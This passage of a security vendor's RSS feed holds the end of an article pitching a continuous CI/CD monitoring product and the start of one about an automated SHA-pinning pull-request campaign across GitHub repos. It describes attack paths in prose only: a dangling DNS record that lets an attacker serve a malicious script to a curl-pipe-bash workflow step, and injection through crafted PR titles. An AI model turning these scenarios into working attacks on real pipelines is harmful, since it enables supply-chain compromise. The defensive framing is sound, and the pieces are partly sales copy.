 &lt;li&gt;Free and open-source - the tool that powered this 50K-repo research&lt;/li&gt; 
&lt;/ul&gt; 
&lt;h3&gt;What ThreatCert Adds&lt;/h3&gt; 
&lt;p&gt;Runner Guard’s scanning engine is integrated into ThreatCert as one of seven intelligence domains. CI/CD Pipeline Intelligence runs continuously alongside:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;strong&gt;Network Intelligence&lt;/strong&gt; - infrastructure exposure, port scanning, service enumeration&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;DNS Intelligence&lt;/strong&gt; - domain health, dangling records, takeover risks&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;TLS/Certificate Intelligence&lt;/strong&gt; - certificate expiry, weak configurations, chain issues&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Web Application Intelligence&lt;/strong&gt; - surface-level web security signals&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Dark Web Intelligence&lt;/strong&gt; - credential leaks, data exposure, threat actor mentions (Coming Q2 2026)&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Social Media Intelligence&lt;/strong&gt; - brand impersonation, phishing campaigns, reputation signals (Coming Q2 2026)&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;CI/CD Pipeline Intelligence&lt;/strong&gt; - Runner Guard’s engine, running continuously&lt;/li&gt; 
&lt;/ol&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/13-threatcert-radar.png" alt="ThreatCert Intelligence Domains - 7-Domain Continuous Monitoring" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;p&gt;Every 60 minutes, ThreatCert re-evaluates your entire entity landscape - including your CI/CD pipelines and the CI/CD pipelines of your dependencies. When a developer adds an unpinned action or introduces an injection sink, ThreatCert detects it in the next scan cycle - not at the next annual audit, not at the next quarterly review, not when the next incident forces a retroactive investigation.&lt;/p&gt; 
&lt;h2&gt;Temporal Shift Analysis&lt;/h2&gt; 
&lt;p&gt;Single scans show you what’s there now. Temporal Shift Analysis shows you how things are changing - and how fast.&lt;/p&gt; 
&lt;p&gt;ThreatCert tracks entity attributes over time, detecting when characteristics migrate. A repository that changed maintainers three times in 30 days is fundamentally different from one that’s been stable for two years - even if both have the same vulnerability count right now. A GitHub Action that changed its tag-to-commit mapping twice in a week is a different risk from one that updates quarterly.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Temporal Shift Velocity&lt;/strong&gt; - the speed of change - becomes its own risk signal. Rapid changes in pipeline configuration, dependency updates, or permission modifications can indicate:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;A legitimate major refactoring (expected, but worth monitoring)&lt;/li&gt; 
 &lt;li&gt;A compromised account making rapid modifications (the AI-paced attack from our &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;force multiplier analysis&lt;/a&gt;)&lt;/li&gt; 
 &lt;li&gt;A maintainer adding infrastructure for a new deployment target (new attack surface)&lt;/li&gt; 
 &lt;li&gt;An organization changing CI/CD tooling (dependency landscape shift)&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;Temporal Shift Analysis catches all of these because it measures velocity, not just state. A snapshot tool sees “this repo has 5 findings.” ThreatCert sees “this repo had 0 findings last week, 2 three days ago, and 5 today - the pipeline is degrading rapidly.”&lt;/p&gt; 
&lt;h2&gt;Attack Condition Alignment Detection&lt;/h2&gt; 
&lt;p&gt;Individual findings are concerning. Aligned conditions across multiple domains are critical.&lt;/p&gt; 
&lt;p&gt;A single unpinned action is a medium-severity finding. An unpinned action in a repo where:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;The maintainer’s credentials appeared in a dark web dump last month&lt;/li&gt; 
 &lt;li&gt;The repo’s GITHUB_TOKEN has write permissions&lt;/li&gt; 
 &lt;li&gt;The workflow processes untrusted input from pull requests&lt;/li&gt; 
 &lt;li&gt;The CI environment has access to production cloud credentials&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;…is not a medium-severity finding. It’s an imminent supply chain compromise waiting for an attacker to connect the dots.&lt;/p&gt; 
&lt;p&gt;ThreatCert’s Attack Condition Alignment Detection correlates CI/CD findings with signals from all seven intelligence domains. The correlation is what transforms individual findings into predictive risk assessment. Runner Guard can tell you the CI/CD pipeline is vulnerable. ThreatCert can tell you that the conditions for exploitation are aligning.&lt;/p&gt; 
&lt;h2&gt;The Organizational Attacker Intent Score&lt;/h2&gt; 
&lt;p&gt;Traditional security metrics count vulnerabilities. ThreatCert’s Organizational Attacker Intent Score (OAIS) asks a different question: how likely is it that an adversary would actually target your organization?&lt;/p&gt; 
&lt;p&gt;The OAIS considers:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Entity landscape:&lt;/strong&gt; What your organization looks like from the outside - your repos, your actions, your dependencies, your exposure&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Attack condition alignment:&lt;/strong&gt; Whether the conditions for a successful attack are present simultaneously across multiple domains&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Temporal velocity:&lt;/strong&gt; How quickly your risk posture is changing&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Ecosystem position:&lt;/strong&gt; Whether your organization sits at a chokepoint (like &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;Docker&lt;/a&gt;) or is a leaf node&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;A high vulnerability count with no attacker interest is different from a moderate vulnerability count with active attacker reconnaissance. The OAIS captures this distinction - it’s a predictive model of adversary behavior, not a vulnerability counter.&lt;/p&gt; 
&lt;h2&gt;Cross-Domain Correlation - Real Scenarios&lt;/h2&gt; 
&lt;p&gt;The power of multi-domain monitoring becomes concrete through examples:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Scenario 1: Dark web credential + CI/CD vulnerability.&lt;/strong&gt; ThreatCert’s Dark Web Intelligence detects that a maintainer of a popular GitHub Action has had credentials appear in a data breach dump. Simultaneously, CI/CD Pipeline Intelligence shows that 500 repos in your vendor chain depend on that action with mutable tags. Either signal alone is informational. Together, they indicate that the conditions for a supply chain compromise through that action are actively aligning. ThreatCert escalates the combined signal before the compromise occurs.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Scenario 2: DNS takeover + CI/CD curl-pipe-bash.&lt;/strong&gt; A workflow downloads and executes a script from &lt;code&gt;install.example.com&lt;/code&gt;. DNS Intelligence detects that the &lt;code&gt;example.com&lt;/code&gt; domain has a dangling CNAME record pointing to a decommissioned cloud instance. An attacker can claim that cloud instance, serve a malicious script, and every CI run that curls from that URL executes the attacker’s code. Neither the CI/CD finding (RGS-006) nor the DNS finding alone tells the full story - the correlation does.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Scenario 3: Social media impersonation + maintainer account.&lt;/strong&gt; Social Media Intelligence detects a new GitHub account impersonating a well-known action maintainer - same avatar, similar username, actively opening issues on popular repos. CI/CD Pipeline Intelligence shows that the real maintainer’s action is used by 1,000+ repos unpinned. The impersonation campaign may be the social engineering precursor to a credential compromise. ThreatCert correlates the impersonation signal with the supply chain exposure and alerts before the compromise attempt.&lt;/p&gt; 
&lt;p&gt;These scenarios aren’t theoretical. They’re the kind of multi-domain attack preparation that single-domain tools - including standalone CI/CD scanners - systematically miss.&lt;/p&gt; 
&lt;h2&gt;2-3 Hop Vendor Chain Monitoring&lt;/h2&gt; 
&lt;p&gt;Runner Guard scans your repos. ThreatCert goes further - it monitors your entire vendor supply chain across all intelligence domains, not just CI/CD.&lt;/p&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain crisis&lt;/a&gt; demonstrated that your security depends on the security of your dependencies. SHA pinning protects you from tag manipulation, but what about the vendor behind the action? What about their network security posture, their DNS hygiene, their TLS configurations, their exposure on dark web forums? A compromised vendor doesn’t just mean a bad commit - it means an organization whose security has degraded across multiple dimensions simultaneously.&lt;/p&gt; 
&lt;p&gt;ThreatCert monitors your vendor chain 2-3 hops deep, every 60 minutes, across all active intelligence domains:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Hop 1:&lt;/strong&gt; Your repos and their direct action dependencies&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Hop 2:&lt;/strong&gt; Your actions’ own CI/CD pipelines and their dependencies&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Hop 3:&lt;/strong&gt; Foundational infrastructure - the build tools, the package managers, the registries&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;At each hop, ThreatCert doesn’t just scan for CI/CD vulnerabilities. With vendor authorization, you see the full ThreatScore across every intelligence module - CI/CD pipeline security, network exposure, DNS health, TLS posture, and web application risks. A vendor with clean CI/CD pipelines but an expiring TLS certificate and dangling DNS records is telling you a story about organizational security priorities. A vendor whose network exposure score has been degrading over 90 days while their maintainer count drops from three to one is telling you a different story - one about an organization that may be losing the capacity to respond to a security event.&lt;/p&gt; 
&lt;p&gt;This is the difference between monitoring your supply chain for known CI/CD vulnerabilities and understanding the actual security posture of the organizations you depend on. When a dependency’s overall threat score starts climbing - not just a new CVE, but a pattern of degradation across network, DNS, and CI/CD simultaneously - ThreatCert alerts you before the compromise reaches your pipelines.&lt;/p&gt; 
&lt;h2&gt;The 50K Scan Proves the Model&lt;/h2&gt; 
&lt;p&gt;This research campaign is the strongest argument for continuous monitoring:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;We scanned 50K repos and found 192,776 findings. &lt;strong&gt;That number is already wrong&lt;/strong&gt; - repos have changed since the scan completed.&lt;/li&gt; 
 &lt;li&gt;We found 20,265 vulnerable repos. Some have been fixed since. Some have gotten worse. &lt;strong&gt;We don’t know which without re-scanning.&lt;/strong&gt;&lt;/li&gt; 
 &lt;li&gt;The &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;2020 inflection&lt;/a&gt; shows that new repos have higher vulnerability rates than old ones. &lt;strong&gt;The problem is getting worse, not better&lt;/strong&gt; - and only continuous measurement shows the trajectory.&lt;/li&gt; 
 &lt;li&gt;The &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI force multiplier&lt;/a&gt; compresses attack timelines from days to hours. &lt;strong&gt;A weekly scan won’t catch an attack that executes and cleans up in four hours.&lt;/strong&gt;&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;The data we’ve published through this series is a service to the community - a snapshot that reveals the scale of CI/CD security risk. But a snapshot, by definition, is frozen. Continuous monitoring is the live feed.&lt;/p&gt; 
&lt;h2&gt;The Funnel&lt;/h2&gt; 
&lt;p&gt;The series of articles traces a natural path:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;strong&gt;Read the research&lt;/strong&gt; (this series) - understand the scale and nature of CI/CD security risk&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Scan your repos with Runner Guard&lt;/strong&gt; - free, open-source, immediate results&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Realize point-in-time isn’t enough&lt;/strong&gt; - pipelines change, dependencies shift, attack conditions align&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;ThreatCert: 7 domains, 60-minute cycles, 2-3 hop vendor chain&lt;/strong&gt; - continuous monitoring that treats CI/CD as one dimension of an integrated threat landscape&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;Vigilant open-sourced Runner Guard so anyone can scan their repos. We built ThreatCert for organizations that need that scan running every hour, correlated with six other intelligence domains, across their entire vendor chain.&lt;/p&gt; 
&lt;h2&gt;Why CI/CD Is Different From Other Security Domains&lt;/h2&gt; 
&lt;p&gt;Organizations have accepted continuous monitoring for network security (IDS/IPS), endpoint security (EDR), and cloud security (CSPM). CI/CD is the gap.&lt;/p&gt; 
&lt;p&gt;The argument for continuous CI/CD monitoring is stronger than for most other domains:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Higher rate of change.&lt;/strong&gt; Network configurations change slowly - firewall rules, routing tables, DNS records update incrementally. CI/CD pipelines change rapidly - developers modify workflows with every feature, every release, every new tooling adoption. The higher the rate of change, the faster a snapshot goes stale.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Supply chain dependency.&lt;/strong&gt; Your network security depends on your own configurations. Your CI/CD security depends on thousands of third-party action maintainers. When a single-maintainer action like &lt;code&gt;action-gh-release&lt;/code&gt; receives a new commit, your security posture potentially changes - without you doing anything. Continuous monitoring catches these external changes. Point-in-time scanning can’t.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;No perimeter.&lt;/strong&gt; Network security has perimeter concepts - firewalls, NATs, DMZs. CI/CD has no perimeter. Workflow files are public. Actions are pulled from public repositories. Credentials flow through shared infrastructure. The attack surface is fully exposed, all the time, to anyone who can read a YAML file. Continuous visibility into this permanently exposed surface isn’t optional.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Attacker speed.&lt;/strong&gt; As we documented in &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI Agents as Force Multipliers&lt;/a&gt;, AI-paced CI/CD attacks can execute in hours. The monitoring frequency needs to match the attack speed. Annual audits worked when attacks were slow. They don’t work when attacks are autonomous.&lt;/p&gt; 
&lt;h2&gt;What You Can Do Today&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Scan your repos with Runner Guard.&lt;/strong&gt; Start with the point-in-time assessment. Know where you stand right now.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Fix what Runner Guard finds.&lt;/strong&gt; Use the &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; to resolve findings - most take minutes.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Add Runner Guard to your CI.&lt;/strong&gt; Run it on every workflow change so new vulnerabilities are caught at the PR stage, before they merge.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Evaluate your monitoring posture.&lt;/strong&gt; Ask: how would we know if one of our action dependencies was compromised today? If the answer is “we wouldn’t until the next scan” - that’s the gap continuous monitoring closes.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Consider ThreatCert for continuous coverage.&lt;/strong&gt; If your organization depends on open-source CI/CD infrastructure (and in 2026, every organization does), the question isn’t whether to monitor it - it’s how often.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The 50K scan revealed the problem. Runner Guard makes the scan accessible. ThreatCert makes it continuous. Together, they cover the full spectrum from awareness to ongoing protection.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;We Scanned GitHub’s Top 50K Repos - Here’s What We Found&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;Anatomy of a CI/CD Chain Attack - From Recon to Exfiltration in 5 Steps&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI Agents as Force Multipliers - The Next Evolution of Supply Chain Attacks&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;From snapshot to continuous.&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;Runner Guard showed you the problem. ThreatCert solves it - continuous CI/CD pipeline monitoring, Temporal Shift Analysis, Attack Condition Alignment Detection, and Organizational Attacker Intent Scoring across your entire vendor chain. Every 60 minutes.&lt;/p&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://vigilantcybersecurity.com/threatcert" class="v-btn v-btn-primary"&gt;See ThreatCert in Action&lt;/a&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-secondary"&gt;Get Runner Guard Free&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fcicd-security-continuous-monitoring-beyond-snapshots&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 18:30:03 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots</guid>
      <dc:date>2026-03-24T18:30:03Z</dc:date>
    </item>
    <item>
      <title>What's Next, Fixing 50K Repos, One PR at a Time</title>
      <link>https://vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests</link>
      <description>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;Finding vulnerabilities is step one. We’re submitting pull requests to fix them - automated remediation at a scale that manual security review can’t match. And a frank assessment of what can and can’t be fixed.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;Across this series - from the &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;pillar findings&lt;/a&gt; through the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain crisis&lt;/a&gt; and the &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;fix guide&lt;/a&gt; - we’ve documented 192,776 CI/CD security findings across 20,265 of GitHub’s most popular repositories. Publishing those findings without fixes would be irresponsible. It would be a shopping list for attackers.&lt;/p&gt; 
&lt;p&gt;We’re doing something different. Vigilant is launching an automated remediation campaign: scanning affected repos, generating fixes, and submitting pull requests. Not disclosing to maintainers and hoping they figure it out - delivering the actual fix, ready to review and merge.&lt;/p&gt; 
&lt;p&gt;This is the responsible disclosure story. It’s also a statement of intent about what security research should look like.&lt;/p&gt; 
&lt;h2&gt;The Plan&lt;/h2&gt; 
&lt;p&gt;The remediation pipeline follows the same automation philosophy that powered the scan:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;strong&gt;Scan&lt;/strong&gt; - Runner Guard identifies findings with rule ID, file, line number, severity, and affected action reference&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Generate fix&lt;/strong&gt; - The autofix engine resolves the finding (currently: SHA pinning for RGS-007, the 74.5% majority)&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Submit PR&lt;/strong&gt; - An automated PR is created with:&lt;/li&gt; 
 &lt;li&gt;What was found (rule ID, description, severity)&lt;/li&gt; 
 &lt;li&gt;Why it matters (attack scenario, blast radius)&lt;/li&gt; 
 &lt;li&gt;The exact fix (diff showing the change)&lt;/li&gt; 
 &lt;li&gt;How to verify (run Runner Guard locally to confirm)&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Maintainer reviews and merges&lt;/strong&gt; - on their own terms, at their own pace&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;No pressure. No deadlines. No public shaming. Just a ready-to-merge fix with full context.&lt;/p&gt; 
&lt;h2&gt;Why PRs Instead of Advisories&lt;/h2&gt; 
&lt;p&gt;The security research industry has a disclosure pattern: find vulnerabilities, publish a report, wait for maintainers to fix it. Sometimes maintainers respond quickly. Often they don’t - they’re busy, they don’t understand the risk, or they don’t know how to fix it.&lt;/p&gt; 
&lt;p&gt;Pull requests change the dynamic:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Ready-to-merge fixes get adopted faster than advisories.&lt;/strong&gt; A maintainer who receives a PR can review a diff and click merge. A maintainer who receives an advisory has to understand the finding, research the fix, implement it, test it, and commit it. The PR removes four of those five steps.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;PRs demonstrate good faith.&lt;/strong&gt; An advisory says “you have a problem.” A PR says “you have a problem, and here’s the solution, and I’ve already done the work.” The relationship is collaborative, not adversarial.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;PRs create accountability on both sides.&lt;/strong&gt; The PR is public. The maintainer can see exactly what we’re proposing. The community can see that we’re not just pointing fingers - we’re contributing fixes. And if our fix is wrong, the maintainer can tell us.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;PRs scale.&lt;/strong&gt; Manual security research produces a report. Automated PR generation produces fixes across thousands of repos. At 50K-repo scale, PRs are the only viable remediation mechanism.&lt;/p&gt; 
&lt;h2&gt;The Prioritization&lt;/h2&gt; 
&lt;p&gt;Not all findings are equal. Our PR campaign follows a tiered prioritization:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Tier&lt;/th&gt; 
   &lt;th&gt;Criteria&lt;/th&gt; 
   &lt;th&gt;Count&lt;/th&gt; 
   &lt;th&gt;Rationale&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;1&lt;/td&gt; 
   &lt;td&gt;Repos that ARE GitHub Actions with vulns&lt;/td&gt; 
   &lt;td&gt;145&lt;/td&gt; 
   &lt;td&gt;Cascade risk - compromise affects all consumers&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;1b&lt;/td&gt; 
   &lt;td&gt;Recursive supply chain (Actions with vulnerable CI)&lt;/td&gt; 
   &lt;td&gt;~50&lt;/td&gt; 
   &lt;td&gt;Foundational infra - aws-actions, nektos/act, create-pull-request&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;2&lt;/td&gt; 
   &lt;td&gt;RGS-010 findings (AI config injection)&lt;/td&gt; 
   &lt;td&gt;4 repos&lt;/td&gt; 
   &lt;td&gt;Novel attack class, high-profile repos&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;3&lt;/td&gt; 
   &lt;td&gt;Taint-to-execution chains&lt;/td&gt; 
   &lt;td&gt;541&lt;/td&gt; 
   &lt;td&gt;Untrusted input → code execution&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;4&lt;/td&gt; 
   &lt;td&gt;RGS-007 + RGS-008 compound&lt;/td&gt; 
   &lt;td&gt;3,172&lt;/td&gt; 
   &lt;td&gt;Complete attack chain in one repo&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;5&lt;/td&gt; 
   &lt;td&gt;Highest-starred repos with critical findings&lt;/td&gt; 
   &lt;td&gt;~89&lt;/td&gt; 
   &lt;td&gt;Maximum visibility per PR&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;6&lt;/td&gt; 
   &lt;td&gt;Everything else by severity&lt;/td&gt; 
   &lt;td&gt;~16,300&lt;/td&gt; 
   &lt;td&gt;Bulk campaign&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;&lt;strong&gt;Tier 1 is the cascade multiplier.&lt;/strong&gt; If a repo IS a GitHub Action AND has vulnerable CI, fixing it doesn’t just secure that repo - it secures every downstream consumer. The 145 vulnerable GitHub Actions repos are the highest-leverage targets in the dataset. Fixing nektos/act (33 findings) secures the CI of every project that tests their Actions locally with act. Fixing peter-evans/create-pull-request (10 findings) secures one of the most widely-used PR automation Actions.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Tier 2 is novel.&lt;/strong&gt; RGS-010 (AI config injection) is a finding class that didn’t exist before Runner Guard. Only 4 repos have it, but they include a leading Python AI framework. These PRs introduce maintainers to an attack vector they may not have considered.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Tier 3 is critical severity.&lt;/strong&gt; Taint-to-execution chains are the most directly exploitable findings - an attacker can trigger them with a crafted PR title or issue body. These repos need immediate attention.&lt;/p&gt; 
&lt;h2&gt;What We Can’t Fix&lt;/h2&gt; 
&lt;p&gt;Not everything in the dataset is fixable through PRs. This is the honest assessment:&lt;/p&gt; 
&lt;h3&gt;The Zombie Repos&lt;/h3&gt; 
&lt;p&gt;809 archived repos have 6.5 million downstream forks and vulnerabilities that will never be patched. Nobody’s home to accept a PR.&lt;/p&gt; 
&lt;p&gt;LibreSpark/LibreTV (26,944 forks, 30 findings), solana-labs/solana (5,557 forks, 4 critical), matrix-org/synapse (2,118 forks, 134 findings) - these repos are frozen. Their vulnerabilities propagate indefinitely through forks.&lt;/p&gt; 
&lt;p&gt;We can’t fix archived repos. What we can do: - &lt;strong&gt;Flag them.&lt;/strong&gt; Make the community aware that these repos have permanent vulnerabilities - &lt;strong&gt;Warn forkers.&lt;/strong&gt; Anyone forking an archived repo should know they’re inheriting vulnerable workflow files - &lt;strong&gt;Track the forks.&lt;/strong&gt; The 26,944 forks of LibreTV each have the same 30 findings - that’s the real scale of the problem&lt;/p&gt; 
&lt;h3&gt;The Abandoned Repos&lt;/h3&gt; 
&lt;p&gt;Beyond archived repos, 376 repos haven’t been pushed to in over a year. 129 haven’t seen activity in two years. PRs submitted to these repos will sit unmerged indefinitely.&lt;/p&gt; 
&lt;p&gt;We’ll submit PRs anyway - in case a maintainer returns - but we’re realistic about the merge rate for dormant projects. The existence of thousands of abandoned repos with active vulnerabilities and active forks is itself a data point that the ecosystem should reckon with.&lt;/p&gt; 
&lt;h3&gt;The Complex Fixes&lt;/h3&gt; 
&lt;p&gt;Some findings can’t be resolved with a simple PR:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Expression injection (RGS-001, RGS-002)&lt;/strong&gt; requires workflow logic changes, not just version pin updates. The maintainer needs to refactor how untrusted input is handled.&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Trigger changes (RGS-009)&lt;/strong&gt; may require redesigning how the workflow processes fork code. The fix is known (&lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;see the Fix It guide&lt;/a&gt;), but it’s not a one-line diff.&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Permission scoping (RGS-008)&lt;/strong&gt; requires the maintainer to determine what minimum permissions each job actually needs.&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;For these findings, our PRs will include the fix recommendation and code examples, but the actual implementation requires maintainer involvement. We’ll provide the roadmap - they’ll navigate the specifics.&lt;/p&gt; 
&lt;h2&gt;The Ecosystem Effect&lt;/h2&gt; 
&lt;p&gt;If the PR campaign succeeds - even partially - the impact extends beyond the repos we directly fix.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Network effects.&lt;/strong&gt; When a major framework repo merges a SHA-pinning PR, the fix becomes visible to everyone who watches that repo. Developers who see SHA-pinned references in projects they respect are more likely to adopt the practice themselves. Each merged PR is a signal to the broader community that CI/CD security matters.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Template propagation.&lt;/strong&gt; Many organizations maintain internal workflow templates that are copied across repos. If the template repo merges our fix, every new repo created from that template starts secure. One PR can secure hundreds of future repos.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Dependabot chain.&lt;/strong&gt; Once SHA pins are in place, Dependabot can maintain them - submitting update PRs when new action versions are released. The initial PR breaks the inertia. Dependabot sustains the momentum.&lt;/p&gt; 
